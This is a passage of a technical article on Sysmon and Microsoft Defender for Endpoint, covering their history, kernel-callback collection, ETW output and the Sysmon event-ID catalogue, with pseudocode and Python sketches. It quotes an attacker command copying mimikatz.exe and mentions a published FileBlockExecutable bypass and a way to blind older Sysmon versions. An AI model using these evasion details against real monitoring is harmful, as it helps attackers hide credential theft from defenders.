The Fall Creators Update in October 2017 broadened the product into prevention: "The Windows Fall Creators Update represents a new chapter in our product evolution as we offer a set of new prevention capabilities designed to stop attacks as they happen and before they have impact. This means that our service will expand beyond detection, investigation, and response, and will now allow companies to use the full power of the Windows security stack for preventative protection" [@ms-blog-atp-jun2017]. Attack Surface Reduction rules, Exploit Guard, and Application Guard joined the platform. So did the Advanced Hunting query surface in 2018 -- KQL on the same Device* tables Maya uses in §1.

The cross-platform reach arrived in March 2019 with macOS support (initially as Microsoft Defender ATP) and was extended to networked Linux and macOS discovery by February 2021 [@securityweek-defender-macos][@bleepingcomputer-defender-linux]. The product was renamed twice. The most-cited rename came at Microsoft Ignite 2020 on September 22, 2020, when the Microsoft Security blog announced the product family rebrand: "Microsoft Defender for Endpoint (previously Microsoft Defender Advanced Threat Protection)" [@ms-unified-siem-xdr-2020]. The same post renamed Microsoft Threat Protection to Microsoft 365 Defender, O365 ATP to Microsoft Defender for Office 365, and Azure ATP to Microsoft Defender for Identity. The second rename came at Microsoft Ignite in November 2023, when Microsoft 365 Defender became Microsoft Defender XDR as part of a broader product rebrand [@defender-xdr-ms-learn][@ms-ignite-2023-blog].

The Ignite 2023 rebrand did not change the KQL substrate, the Device* schema, or the Sentinel connector contract. It is a marketing relabel on top of a stable cloud surface. Detection engineering teams kept writing queries against DeviceProcessEvents exactly as they did the day before the rename.

The configuration-lineage arc

A third arc ran in parallel with the two product arcs: the community-maintained Sysmon configurations that turned Sysmon from a kernel-callback publisher into a deployment-ready detection sensor.

The historical root is SwiftOnSecurity's sysmon-config repository, created on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. The README's design intent is succinct: "This is a Microsoft Sysinternals Sysmon configuration file template with default high-quality event tracing" [@github-swiftonsecurity]. The repository remains the most-cited Sysmon-configuration starting point in the SOC industry.

Florian Roth, working under the handle @Neo23x0, forked SwiftOnSecurity's config in January 2018 (the exact creation date is now obscured by a 2021 rename -- see the sidenote below). The fork added blocking-rule support for Sysmon v14, an actively-maintained set of community pull-request merges, and the export-block.xml variant that ships the v14+ FileBlockExecutable rules. The README states the lineage verbatim: "This is a forked and modified version of @SwiftOnSecurity's sysmon config. ... We merged most of the 30+ open pull requests" [@github-neo23x0]. The current maintainer roster lists Florian Roth, Tobias Michalski, Christian Burkard, and Nasreddine Bencherchali.

Olaf Hartong's sysmon-modular was created on January 13, 2018 per the GitHub REST API [@github-hartong-meta]. The repository takes a different design approach: instead of one monolithic XML config, Hartong ships a per-EID-and-per-technique module library that compiles down into one of several pre-generated artifacts -- sysmonconfig.xml (default), sysmonconfig-with-filedelete.xml (default plus archive), sysmonconfig-excludes-only.xml (verbose), sysmonconfig-research.xml (super-verbose, with the warning "really DO NOT USE IN PRODUCTION!"), and the load-bearing sysmonconfig-mde-augment.xml whose entire design intent is to fill the gaps in Defender for Endpoint's collection surface [@github-hartong-modular].

Olaf Hartong and Henri Hambartsumyan, the two FalconForce researchers who reverse-engineered Defender for Endpoint in 2022 and surfaced CVE-2022-23278, also maintain olafhartong/sysmon-modular. This dual identity is what makes the sysmonconfig-mde-augment.xml config uniquely informed: the same people who learned where MDE's collection falls short of Sysmon's manifest also published the config that fills those gaps [@falconforce-2022][@github-hartong-modular].

The Neo23x0 repository was renamed in 2021. The old https://github.com/Neo23x0/sysmon-config URL now redirects (HTTP 301) to https://github.com/NextronSystems/sysmon-config, and the GitHub REST API returns a created_at of 2021-07-24T06:19:41Z with a parent field pointing to SwiftOnSecurity/sysmon-config [@github-nextronsystems-meta]. The content lineage from SwiftOnSecurity is unchanged; only the organizational owner moved from Florian Roth's personal handle to his employer Nextron Systems.

By 2023, then, two product arcs and one configuration arc had converged on the same baseline: kernel callbacks (PsSetCreateProcessNotifyRoutineEx, ObRegisterCallbacks, CmRegisterCallbackEx, Filter Manager minifilters) on the input side; an Antimalware-PPL protected service on the host; an ETW or TLS-pinned cloud transport in the middle; and KQL on Device* tables on the reader side. The convergence was structural, not coincidental. To see why both arcs landed in the same place, we have to start at the kernel-callback boundary -- where Sysmon's input lives.

3. Sysmon Architecture: Kernel Collection, ETW Emission, Event Log Persistence

If you have ever read that Sysmon is an "ETW-based event source," you have read something that is half-true. The half that is right is the output side: Sysmon publishes its events through an ETW provider called Microsoft-Windows-Sysmon, and the rest of the system -- including the Windows Event Log service -- subscribes to that provider. The half that is wrong is the input side. Sysmon does not get most of its raw observations from ETW. It gets them from five kernel-callback families and one Filter Manager minifilter, with two narrow ETW-consumer exceptions (DNS-Client for EID 22; the WMI activity provider for EIDs 19-21).

This distinction is small enough that most blog posts skip it and big enough that getting it wrong leads to architectural confusion. The split between collection (how data enters the Sysmon driver) and emission (how data leaves the Sysmon service) is the first thing to get straight before anything else makes sense.

Event Tracing for Windows (ETW): The in-kernel, low-overhead, manifest-described tracing infrastructure built into Windows since 2000. Providers publish structured events; controllers start trace sessions and select which providers to enable; consumers receive events live or read them from `.etl` files. Sysmon uses ETW as its *output* bus -- its kernel driver hands events to the user-mode service via a private ETW session -- and as a small input source for the DNS-Client kernel provider (EID 22) and the WMI activity provider (EIDs 19-21).

Kernel callback: A Microsoft-sanctioned ring-0 API for observing operating-system events without patching the System Service Descriptor Table. The Windows kernel exposes a small set of named callback APIs -- `PsSetCreateProcessNotifyRoutineEx` for process create and exit, `PsSetLoadImageNotifyRoutine` for image load (with a `SystemModeImage` bit that distinguishes kernel drivers from user-mode DLLs), `PsSetCreateThreadNotifyRoutineEx` for thread creation (with a remote-thread flag), `ObRegisterCallbacks` for handle-rights filtering against `PsProcessType` and `PsThreadType`, `CmRegisterCallbackEx` for registry operations, and the Filter Manager minifilter framework for file-system I/O. A driver registers a function pointer; the kernel invokes it on the corresponding event with the structured context. PatchGuard tolerates kernel callbacks; it does not tolerate SSDT patching [@wikipedia-kpp][@pssetcreateex-msdn][@ms-wdk-kernel-callbacks].

Filter Manager: The file-system filter-driver framework (`FltMgr.sys`) that hosts minifilter drivers between the I/O manager and the file-system stack. Each minifilter declares an *altitude* (a decimal string that fixes its position in the filter stack) and receives notifications for pre- and post-operation hooks on file create, file write, set-information, and set-security. Both `SysmonDrv.sys` and `WdFilter.sys` are minifilters; they coexist at different altitudes without colliding [@sysmon-ms-learn].
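
To make the altitude idea concrete, here is a small Python sketch of how two minifilters at different altitudes are ordered. The altitude values are assumptions (commonly reported defaults, not taken from the sources cited here) and should be checked on a real host with `fltmc filters`; the `pre_operation_order` helper is hypothetical.

```python
from decimal import Decimal

# Assumed altitudes; verify on a real host before relying on them.
minifilters = {
    "SysmonDrv": "385201",
    "WdFilter": "328010",
}


def pre_operation_order(filters):
    """Order filter names by descending altitude.

    Filter Manager invokes pre-operation callbacks from the highest
    altitude down, so the first name returned sees the I/O first.
    Altitudes are decimal strings, hence Decimal rather than int.
    """
    return sorted(filters, key=lambda name: Decimal(filters[name]), reverse=True)


order = pre_operation_order(minifilters)
```

Because every filter has a distinct position, both drivers observe the same file operation in a fixed sequence instead of competing for it.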

Five collection mechanisms, one ETW publisher

The Microsoft Learn page for Sysmon enumerates the event IDs and describes them at the what level; the how (which kernel API actually produced each event) is documented partly in the API references for each callback API and partly in the source code of Sysmon's open Linux port, microsoft/SysmonForLinux, which reuses Sysinternals' shared C++ rule-engine for parsing the same XML schema and translating it onto eBPF instead of kernel callbacks [@github-sysmon-linux][@sysmon-ms-learn]. The Windows port is closed source, but Sysinternals' design has been documented enough -- across the RSA 2014 talk, the Diversenok 2022 reverse-engineering writeup, and the SysmonForLinux source -- that the collection-mechanism inventory is unambiguous.

Listed at API granularity, the mechanisms occupy six rows:

| Mechanism | API or framework | Sysmon EIDs produced |
| --- | --- | --- |
| Process-lifetime callback | `PsSetCreateProcessNotifyRoutineEx` | 1 (ProcessCreate), 5 (ProcessTerminate) |
| Image-load callback | `PsSetLoadImageNotifyRoutine` | 7 (ImageLoad); 6 (DriverLoad, distinguished by the `IMAGE_INFO.SystemModeImage` flag on the kernel-mode image) |
| Thread-creation callback | `PsSetCreateThreadNotifyRoutineEx` (with the `PS_CREATE_THREAD_NOTIFY_FLAG_CREATE_REMOTE` flag in `CREATE_THREAD_NOTIFY_INFO`) | 8 (CreateRemoteThread) |
| Object Manager callback | `ObRegisterCallbacks` against `PsProcessType` | 10 (ProcessAccess) |
| Registry callback | `CmRegisterCallbackEx` | 12 (Registry Object Create/Delete), 13 (Registry Value Set), 14 (Registry Key/Value Rename) |
| Filter Manager minifilter | `FltRegisterFilter` against `FltCreate`/`FltClose`/`FltSetInformation` -- ordinary file system, and the Named Pipe File System (NPFS, `\Device\NamedPipe`) at a different altitude | 11 (FileCreate), 15 (FileCreateStreamHash), 17 (PipeEvent Created), 18 (PipeEvent Connected), 23 (FileDelete archived), 26 (FileDeleteDetected), 27 (FileBlockExecutable), 28 (FileBlockShredding), 29 (FileExecutableDetected) |

The five-mechanism framing collapses thread-creation and Object Manager callbacks into one architectural family ("process and thread observation via Microsoft-sanctioned callbacks"); a stricter count is six (process-lifetime, image-load, thread-creation, object-handle, registry, minifilter). Either count is defensible; what matters is keeping the API attribution honest: PsSetCreateThreadNotifyRoutineEx is the canonical remote-thread observer, ObRegisterCallbacks(PsProcessType) is the canonical handle-rights filter, and NPFS minifiltering -- not ObRegisterCallbacks -- is what observes named-pipe creation and connection.
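
The attribution above can be kept honest in tooling with a simple lookup. This Python sketch transcribes the mechanism-to-EID mapping from the table; the `mechanism_for` helper is a hypothetical name, and EIDs fed by the ETW consumer path deliberately return `None` because they are not kernel-callback events.

```python
# Mechanism -> EIDs, transcribed from the table above.
COLLECTION_MECHANISMS = {
    "PsSetCreateProcessNotifyRoutineEx": [1, 5],
    "PsSetLoadImageNotifyRoutine": [6, 7],
    "PsSetCreateThreadNotifyRoutineEx": [8],
    "ObRegisterCallbacks": [10],
    "CmRegisterCallbackEx": [12, 13, 14],
    "Filter Manager minifilter": [11, 15, 17, 18, 23, 26, 27, 28, 29],
}


def mechanism_for(eid):
    """Return the kernel mechanism that produces `eid`, or None if the
    event does not come from one of the callback families in the table."""
    for mechanism, eids in COLLECTION_MECHANISMS.items():
        if eid in eids:
            return mechanism
    return None


pipe_source = mechanism_for(17)    # named-pipe creation
access_source = mechanism_for(10)  # process access
dns_source = mechanism_for(22)     # DNS query: ETW consumer path, not a callback
```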

The sixth source -- the ETW consumer path -- is special. For DNS queries (EID 22), Sysmon does not register a kernel callback. It subscribes as a consumer of the Microsoft-published Microsoft-Windows-DNS-Client ETW provider, parses the structured DNS events, and republishes them through its own ETW provider with the Sysmon enrichments applied [@sysmon-version-history]. DNS queries are the only events Sysmon consumes from a Microsoft-published kernel ETW provider; the WmiEvent family (EIDs 19-21) is implemented in a similar consumer style against the WMI activity provider's user-mode tracing surface, which is why the §4 catalogue marks those rows as "WMI ETW provider consumer." Either way, ETW consumption is the input-side exception, not the rule: five kernel-callback families do the bulk of the work, and ETW is the input only for a small, deliberately chosen set of events.

The Sysmon ETW provider has the GUID {5770385F-C22A-43E0-BF4C-06F5698FFBD9}. Microsoft Learn does not enumerate this GUID on the Sysmon page; the authoritative on-host discovery command is logman query providers Microsoft-Windows-Sysmon, which returns the GUID, the keywords mask, and the registered processes. Pavel Yosifovich's community ETW-provider catalogue EtwExplorer mirrors the value [@etwexplorer-sysmon-guid], with the on-host logman command remaining the authority of last resort.

The ProcessCreate path, step by step

The clearest way to see how the pieces fit is to trace one event. ProcessCreate (EID 1) is the most-quoted event in the manifest -- it is the EID that produces Maya's row in §1 -- and its handling follows the canonical kernel-callback pattern that Microsoft codified in PsSetCreateProcessNotifyRoutineEx:

// Conceptual pseudocode for SysmonDrv's process-create path.
// Real Sysmon source for Windows is closed; the Linux port is open.
// The callback signature follows the contract documented in the WDK
// reference for PsSetCreateProcessNotifyRoutineEx. The Sysmon* helper
// names are illustrative, not real exports.

VOID SysmonProcessCreateCb(PEPROCESS, HANDLE, PPS_CREATE_NOTIFY_INFO);

NTSTATUS SysmonDrvEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(DriverObject);
    UNREFERENCED_PARAMETER(RegistryPath);
    // 1. Register the create-process callback (Remove = FALSE).
    //    PatchGuard tolerates this.
    NTSTATUS status = PsSetCreateProcessNotifyRoutineEx(SysmonProcessCreateCb, FALSE);
    if (!NT_SUCCESS(status)) {
        return status;  // Registration can fail; do not load half-armed.
    }
    // ... other callbacks registered similarly ...
    return STATUS_SUCCESS;
}

VOID SysmonProcessCreateCb(
    PEPROCESS  Process,                 // Process object being created or exiting
    HANDLE     ProcessId,
    PPS_CREATE_NOTIFY_INFO  CreateInfo  // NULL on process exit
) {
    UNREFERENCED_PARAMETER(Process);
    if (CreateInfo == NULL) {
        // Process exit: emit EID 5 (ProcessTerminate).
        SysmonEmitEventEID5(ProcessId);
        return;
    }
    // Process create. The parent PID is CreateInfo->ParentProcessId.
    // Apply the XML rule engine: does this process match any <Include>
    // rule, after evaluating <Exclude> overrides?
    if (!SysmonRuleMatch(EID_1, CreateInfo)) {
        return;  // Filtered: produce no event.
    }
    // Enrich with parent process, command line, image hash, integrity
    // level, user SID, ProcessGuid, and session identifiers, then ship
    // through the private Microsoft-Windows-Sysmon ETW publisher.
    SysmonEmitEventEID1(ProcessId, CreateInfo);
}

Four properties of the path matter. First, the callback is invoked synchronously on the thread that issued the CreateProcessW call, before the new process's first instruction runs; the parent and child PIDs are both known, but the new process has not yet executed any user-mode code. Second, the callback is rate-limited only by your rule engine -- there is no built-in throttle, and a verbose <Include> rule on a high-process-turnover host can saturate the ETW session. Third, the callback runs at IRQL = PASSIVE_LEVEL, so it can do file I/O (which the driver needs for hashing) but it must do that I/O carefully to avoid deadlock on the very file system it is monitoring. Fourth, the Sysmon service runs as a separate user-mode process; if the service has crashed or been suspended, the driver continues to emit ETW events into a session with no listener and they evaporate.
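
The filtering step in the pseudocode ("match any include rule, after evaluating exclude overrides") can be modelled in a few lines of user-mode Python. This is a deliberately simplified sketch, not Sysmon's rule engine: a rule here is a hypothetical dict of field name to required substring, and the real XML grammar supports many more condition types.

```python
def matches(rule, event):
    """True when every field named in the rule contains the rule's
    substring (case-insensitive). A simplification of Sysmon conditions."""
    return all(
        needle.lower() in event.get(field, "").lower()
        for field, needle in rule.items()
    )


def should_emit(event, include_rules, exclude_rules):
    """Exclude rules override include rules; an event with no matching
    include rule is filtered and produces no event."""
    if any(matches(rule, event) for rule in exclude_rules):
        return False
    return any(matches(rule, event) for rule in include_rules)


# Hypothetical rules and events for illustration only.
include_rules = [{"Image": "powershell.exe"}]
exclude_rules = [{"ParentImage": "explorer.exe"}]

from_word = {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
             "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE"}
from_shell = {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "ParentImage": r"C:\Windows\explorer.exe"}

emit_word = should_emit(from_word, include_rules, exclude_rules)
emit_shell = should_emit(from_shell, include_rules, exclude_rules)
```

The second property above follows directly from this shape: the only throttle is how many events the include rules let through.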

ProcessGuid: Sysmon's per-process unique identifier, formatted as a 128-bit GUID and recorded as the `ProcessGuid` field on every event that names a process. Unlike a Windows process ID, the ProcessGuid survives PID reuse and uniquely identifies a process across its lifetime [@sysmon-ms-learn]; SOC tooling commonly joins on `(DeviceId, ProcessGuid)` to reconstruct process trees and avoid the PID-reuse race condition that plagues raw `ProcessId` joins.
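
A short Python sketch shows why the GUID join is safer than the PID join. The three events and their GUID strings are hypothetical; the field names (`ProcessGuid`, `ProcessId`, `ParentProcessGuid`, `ParentProcessId`, `Image`) follow the ProcessCreate event layout.

```python
# Hypothetical ProcessCreate events in arrival order. PID 100 is reused
# by an unrelated process after the original parent has exited.
events = [
    {"ProcessGuid": "{00000000-0000-0000-0000-000000000001}", "ProcessId": 100,
     "ParentProcessGuid": None, "ParentProcessId": 4, "Image": "WINWORD.EXE"},
    {"ProcessGuid": "{00000000-0000-0000-0000-000000000002}", "ProcessId": 200,
     "ParentProcessGuid": "{00000000-0000-0000-0000-000000000001}",
     "ParentProcessId": 100, "Image": "powershell.exe"},
    {"ProcessGuid": "{00000000-0000-0000-0000-000000000003}", "ProcessId": 100,
     "ParentProcessGuid": None, "ParentProcessId": 4, "Image": "notepad.exe"},
]

by_guid = {e["ProcessGuid"]: e for e in events}
by_pid = {e["ProcessId"]: e for e in events}  # later events overwrite earlier ones

child = by_guid["{00000000-0000-0000-0000-000000000002}"]

# Joining on the GUID finds the real parent.
parent_via_guid = by_guid[child["ParentProcessGuid"]]["Image"]
# Joining on the raw PID lands on whichever process last held PID 100.
parent_via_pid = by_pid[child["ParentProcessId"]]["Image"]
```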

Where the events go

Once the user-mode Sysmon.exe service has labelled the event, it does two things. First, it writes the event to the Windows event log -- specifically to Applications and Services Logs/Microsoft/Windows/Sysmon/Operational per Microsoft Learn's verbatim statement: "On Vista and higher, events are stored in Applications and Services Logs/Microsoft/Windows/Sysmon/Operational" [@sysmon-ms-learn]. Second, the same event is also visible to any ETW real-time consumer subscribed to Microsoft-Windows-Sysmon -- which is how downstream collectors (Windows Event Forwarding, Splunk's universal forwarder, the Elastic Endpoint integration, Wazuh's Windows agent) actually pick the events up, rather than tailing the event log XML.
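
Once an event is in the log, its XML rendering is straightforward to consume. The following Python sketch parses one event in the standard Windows event XML layout (a `System` block plus named `Data` elements under `EventData`). The sample event is hand-written for illustration, with only a few of the fields a real ProcessCreate event carries, and `parse_event` is a hypothetical helper.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Hand-written sample, trimmed to a few fields.
SAMPLE = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}"/>
    <EventID>1</EventID>
    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
  </System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="ParentImage">C:\Program Files\Microsoft Office\WINWORD.EXE</Data>
  </EventData>
</Event>"""


def parse_event(xml_text):
    """Return (event_id, {field name: value}) for one event XML document."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    fields = {d.get("Name"): d.text for d in root.findall("e:EventData/e:Data", NS)}
    return event_id, fields


event_id, fields = parse_event(SAMPLE)
```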

flowchart LR
    K1["PsSetCreateProcessNotifyRoutineEx"] --> D[SysmonDrv.sys]
    K2["PsSetLoadImageNotifyRoutine"] --> D
    K3["PsSetCreateThreadNotifyRoutineEx"] --> D
    K4["ObRegisterCallbacks (PsProcessType)"] --> D
    K5["CmRegisterCallbackEx"] --> D
    K6["FltRegisterFilter (file system + NPFS)"] --> D
    K7["ETW consumer: DNS-Client + WMI activity"] --> D
    D --> P["ETW publisher: Microsoft-Windows-Sysmon"]
    P --> S[Sysmon.exe service]
    S --> L["Applications and Services Logs / Microsoft / Windows / Sysmon / Operational"]
    P --> R["Real-time ETW consumers (WEF, Splunk UF, Wazuh, Elastic)"]

This is the first aha moment. Sysmon is not "ETW based" in the way most blog posts imply. Sysmon is a kernel driver that uses ETW as its IPC bus to user mode, and as a special-case consumer for two providers (DNS-Client and the WMI activity provider). The reason Sysmon needed a kernel driver in the first place is that ETW alone could not see what the kernel callbacks see: ETW could not, in 2014, deliver a synchronous parent-PID-and-image-hash structure at process create time. Sysmon's driver does that work; ETW transports the result.

The protected-process gate added in v15 (June 2023) closed the most-trivial blinding attack -- a SYSTEM-privilege process can no longer issue OpenProcess(PROCESS_TERMINATE) against the Sysmon service to silence it. Raising the bar to a kernel-mode primitive does not eliminate the attack class, but it does change the cost model. The protected-process gate is the architectural inflection that distinguishes pre-v15 Sysmon (trivially blindable) from post-v15 Sysmon (requires a kernel primitive or a BYOVD chain) [@sysmon-ms-learn][@bleepingcomputer-sysmon15].

Five collection mechanisms, one ETW publisher, one event log. That is the input side. Now the catalogue.

4. The Sysmon Event Catalogue: Twenty-Nine IDs and Their Version Gating

Run sysmon -s on any v15.2 host and you get an XML schema enumerating twenty-nine event types plus EID 255 (Error). Every detection-engineering corpus in the field -- SwiftOnSecurity's config, Florian Roth's fork, Hartong's modular, the SigmaHQ rule base, the Threat Hunter Playbook -- is downstream of this single schema [@sysmon-ms-learn][@github-sigma][@github-otrf-thp]. Learn the catalogue once and the rest of the Sysmon toolchain unfolds from it.

A naming disambiguation is worth doing first, because the colloquial event names the field uses differ from the canonical Microsoft Learn names. "RegistrySet" is colloquial shorthand for RegistryEvent (Value Set), EID 13. "DnsQuery" is colloquial shorthand for DNSEvent (DNS query), EID 22. "NamedPipeConnect" conflates two events: PipeEvent (Pipe Created), EID 17, and PipeEvent (Pipe Connected), EID 18. The article uses the canonical Microsoft Learn names from here on.

Note: Sysmon's manifest names some events as a family with a parenthetical operation: RegistryEvent (Object create and delete) (EID 12), RegistryEvent (Value Set) (EID 13), RegistryEvent (Key and Value Rename) (EID 14). The same pattern applies to the pipe events: PipeEvent (Pipe Created) (EID 17) and PipeEvent (Pipe Connected) (EID 18). When detection-rule tooling references "EID 12-14" or "EID 17-18", these families are what it means. The colloquial single-name forms used elsewhere in the literature are not wrong; they are just less precise. The MDE schema does not preserve the parenthetical operation suffix; it surfaces these as ActionType values inside DeviceRegistryEvents.
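
For rule tooling that has to accept both spellings, the disambiguation can be written down as data. This Python sketch covers only the three colloquial names discussed above; the `canonical` helper is a hypothetical name.

```python
# Colloquial name -> list of (EID, canonical Microsoft Learn name).
COLLOQUIAL_NAMES = {
    "RegistrySet": [(13, "RegistryEvent (Value Set)")],
    "DnsQuery": [(22, "DNSEvent (DNS query)")],
    "NamedPipeConnect": [
        (17, "PipeEvent (Pipe Created)"),
        (18, "PipeEvent (Pipe Connected)"),
    ],
}


def canonical(name):
    """Resolve a colloquial name to its canonical events; unknown names
    resolve to an empty list rather than raising."""
    return COLLOQUIAL_NAMES.get(name, [])


pipe_eids = [eid for eid, _ in canonical("NamedPipeConnect")]
```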

The twenty-nine plus one catalogue

The catalogue groups naturally by the collection mechanism that produces each event:

| EID | Canonical name | Collection mechanism | Introduced | Maps to (MDE) |
| --- | --- | --- | --- | --- |
| 1 | ProcessCreate | `PsSetCreateProcessNotifyRoutineEx` | v1.0 (Aug 2014) | `DeviceProcessEvents` (`ProcessCreated`) |
| 2 | FileCreateTime | Filter Manager | v1.0 (Aug 2014) | `DeviceFileEvents` (`FileCreated`, partial) |
| 3 | NetworkConnect | Internal network-callout | v1.0 (Aug 2014) | `DeviceNetworkEvents` (`ConnectionSuccess`) |
| 4 | ServiceStateChange | Sysmon-internal | v1.0 (Aug 2014) | (Sysmon-only) |
| 5 | ProcessTerminate | `PsSetCreateProcessNotifyRoutineEx` | v1.0 (Aug 2014) | `DeviceProcessEvents` (`ProcessTerminated`) |
| 6 | DriverLoad | `PsSetLoadImageNotifyRoutine` (kernel-mode case via `IMAGE_INFO.SystemModeImage`) | v2.0 (2015) | `DeviceEvents` (`DriverLoad`) |
| 7 | ImageLoad | `PsSetLoadImageNotifyRoutine` | v2.0 (2015) | `DeviceImageLoadEvents` |
| 8 | CreateRemoteThread | `PsSetCreateThreadNotifyRoutineEx` (with `CREATE_REMOTE` flag) | v3.0 (2016) | `DeviceEvents` (truncated) |
| 9 | RawAccessRead | `\Device\Harddisk*` write filter | v3.0 (2016) | (Sysmon-only) |
| 10 | ProcessAccess | `ObRegisterCallbacks` (PsProcessType) | v6.0 (Feb 2017) | `DeviceEvents` (GrantedAccess truncated) |
| 11 | FileCreate | Filter Manager | v6.0 (Feb 2017) | `DeviceFileEvents` |
| 12 | RegistryEvent (Object create/delete) | `CmRegisterCallbackEx` | v6.0 (Feb 2017) | `DeviceRegistryEvents` |
| 13 | RegistryEvent (Value Set) | `CmRegisterCallbackEx` | v6.0 (Feb 2017) | `DeviceRegistryEvents` |
| 14 | RegistryEvent (Key/Value Rename) | `CmRegisterCallbackEx` | v6.0 (Feb 2017) | `DeviceRegistryEvents` |
| 15 | FileCreateStreamHash | Filter Manager | v6.0 (Feb 2017) | (Sysmon-only) |
| 16 | ServiceConfigurationChange | Sysmon-internal | v6.0 (Feb 2017) | (Sysmon-only) |
| 17 | PipeEvent (Pipe Created) | Filter Manager minifilter on NPFS (`\Device\NamedPipe`) | v6.0 (Feb 2017) | (Sysmon-only) |
| 18 | PipeEvent (Pipe Connected) | Filter Manager minifilter on NPFS (`\Device\NamedPipe`) | v6.0 (Feb 2017) | (Sysmon-only) |
| 19 | WmiEvent (filter) | WMI ETW provider consumer | v6.10 (mid-2017) | (Sysmon-only) |
| 20 | WmiEvent (consumer) | WMI ETW provider consumer | v6.10 (mid-2017) | (Sysmon-only) |
| 21 | WmiEvent (consumer-to-filter binding) | WMI ETW provider consumer | v6.10 (mid-2017) | (Sysmon-only) |
| 22 | DNSEvent (DNS query) | ETW consumer of `Microsoft-Windows-DNS-Client` | v10.0 (Jun 2019) | `DeviceNetworkEvents` (`DnsQuery`) |
| 23 | FileDelete (archive) | Filter Manager | v11.10 (Jun 2020) | `DeviceFileEvents` (partial) |
| 24 | ClipboardChange | RDP and Win32 clipboard hooks | v13.0 (2021; disputed) | (Sysmon-only) |
| 25 | ProcessTampering | Image-load and `WriteProcessMemory` heuristic | v13.0 (2021; disputed) | (Sysmon-only) |
| 26 | FileDeleteDetected | Filter Manager (non-archiving) | v13.30 (2022) | `DeviceFileEvents` |
| 27 | FileBlockExecutable | Filter Manager (blocking) | v14.0 (Aug 2022) | (Sysmon-only) |
| 28 | FileBlockShredding | Filter Manager (blocking) | v14.10 (2022) | (Sysmon-only) |
| 29 | FileExecutableDetected | Filter Manager | v15.0 (Jun 2023) | `DeviceFileEvents` |
| 255 | Error | Sysmon-internal | v1.0 (Aug 2014) | (Sysmon-only) |

The Sysmon Version History repository's "Outdated" disclaimer ("I didn't find enough time to update this repo - sorry") means the v12 vs v13 boundary for ClipboardChange and ProcessTampering is community-disputed. The canonical Microsoft Learn page does not enumerate version-introduction metadata per event ID. The dates in the table for EIDs 24 and 25 are best-effort community attributions and should be treated as approximate until Microsoft publishes a per-EID version history [@sysmon-version-history][@sysmon-ms-learn].
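
Version gating matters in practice when one config is pushed to a fleet with mixed Sysmon versions. The Python sketch below transcribes the "Introduced" column of the catalogue (including the disputed v13.0 attribution for EIDs 24 and 25) and answers which EIDs a given version can emit. The helper names are hypothetical, and versions are assumed to be simple `major.minor` strings.

```python
# EID -> (major, minor) of the version that introduced it, per the catalogue.
INTRODUCED = {}
for eids, version in [
    ((1, 2, 3, 4, 5, 255), (1, 0)),
    ((6, 7), (2, 0)),
    ((8, 9), (3, 0)),
    (tuple(range(10, 19)), (6, 0)),   # EIDs 10 through 18
    ((19, 20, 21), (6, 10)),
    ((22,), (10, 0)),
    ((23,), (11, 10)),
    ((24, 25), (13, 0)),              # community-disputed boundary
    ((26,), (13, 30)),
    ((27,), (14, 0)),
    ((28,), (14, 10)),
    ((29,), (15, 0)),
]:
    for eid in eids:
        INTRODUCED[eid] = version


def parse_version(text):
    """Turn '14.10' into (14, 10) so versions compare numerically."""
    major, minor = text.split(".")
    return int(major), int(minor)


def available_eids(sysmon_version):
    """Sorted EIDs that the given Sysmon version is able to emit."""
    target = parse_version(sysmon_version)
    return sorted(eid for eid, v in INTRODUCED.items() if v <= target)


on_v14 = available_eids("14.0")
on_v15_2 = available_eids("15.2")
```

Comparing tuples rather than floats keeps v6.10 correctly ahead of v6.2-style versions.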

The design intent, in one sentence

The catalogue exists because Sysmon's design choice -- the one Microsoft Learn still prints today -- explicitly refuses to do detection. The publisher emits structured events; the detection logic is somebody else's problem.

"Sysmon does not provide analysis of the events it generates, nor does it attempt to hide itself from attackers."

This is the sentence that explains the entire SwiftOnSecurity-NextronSystems-Hartong configuration lineage [@sysmon-ms-learn]. If Sysmon refuses to do detection, somebody has to write the rules. Three somebodies did, and they wrote three different sets, and §5 is about the trade-offs between them.

What EID 27 is, and what it is not

The 2022 introduction of FileBlockExecutable (EID 27) was the first preventive event in Sysmon's history. Olaf Hartong's contemporaneous writeup and Diversenok's independent reproduction both describe what the event does, and the mechanism is more subtle than "the I/O is denied." The Sysmon minifilter intercepts the file-handle close operation. If the rule matches and the file content carries an MZ/PE header, Sysmon logs EID 27 and marks the file for deletion via FILE_DISPOSITION_INFORMATION [@diversenok-2022][@hartong-sysmon14-medium]. The attacker's cmd /c copy mimikatz.exe C:\Users\Public\ produces no command-line error. The copy appears to succeed. The file is then deleted at handle-close time. Hartong's writeup captures the user-visible effect verbatim: "*While there is no error on the command line, the file is not written to disk*" [@hartong-sysmon14-medium]. Diversenok's reverse-engineering reads: "*Sysmon monitors and deletes files on closing instead of writing*" [@diversenok-2022]. The closing-time semantics is the structural reason Diversenok's Bypass #1 (split create-close from open-write-close) works at all; the bypass is incoherent under an Access Denied-at-create model and obvious under the close-time-delete model.
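
The close-time semantics are easy to misread, so here is a user-mode Python model of the behaviour described above: the write succeeds without error, and the file disappears only when the handle is closed. It is a toy simulation with hypothetical helper names, run against a temporary directory; it does not reproduce Sysmon's minifilter or any bypass.

```python
import os
import tempfile


def close_time_filter(path, rule_matches=True):
    """Model of the check that runs when the handle closes: if the rule
    matches and the content starts with an MZ header, 'log' EID 27 and
    delete the file. Returns the logged EID, or None."""
    with open(path, "rb") as fh:
        header = fh.read(2)
    if rule_matches and header == b"MZ":
        os.remove(path)
        return 27
    return None


def copy_file(data, dest):
    """Write `data` to `dest`; the write itself raises no error. The
    filter runs only after the with-block has closed the handle."""
    with open(dest, "wb") as fh:
        fh.write(data)
    return close_time_filter(dest)


with tempfile.TemporaryDirectory() as workdir:
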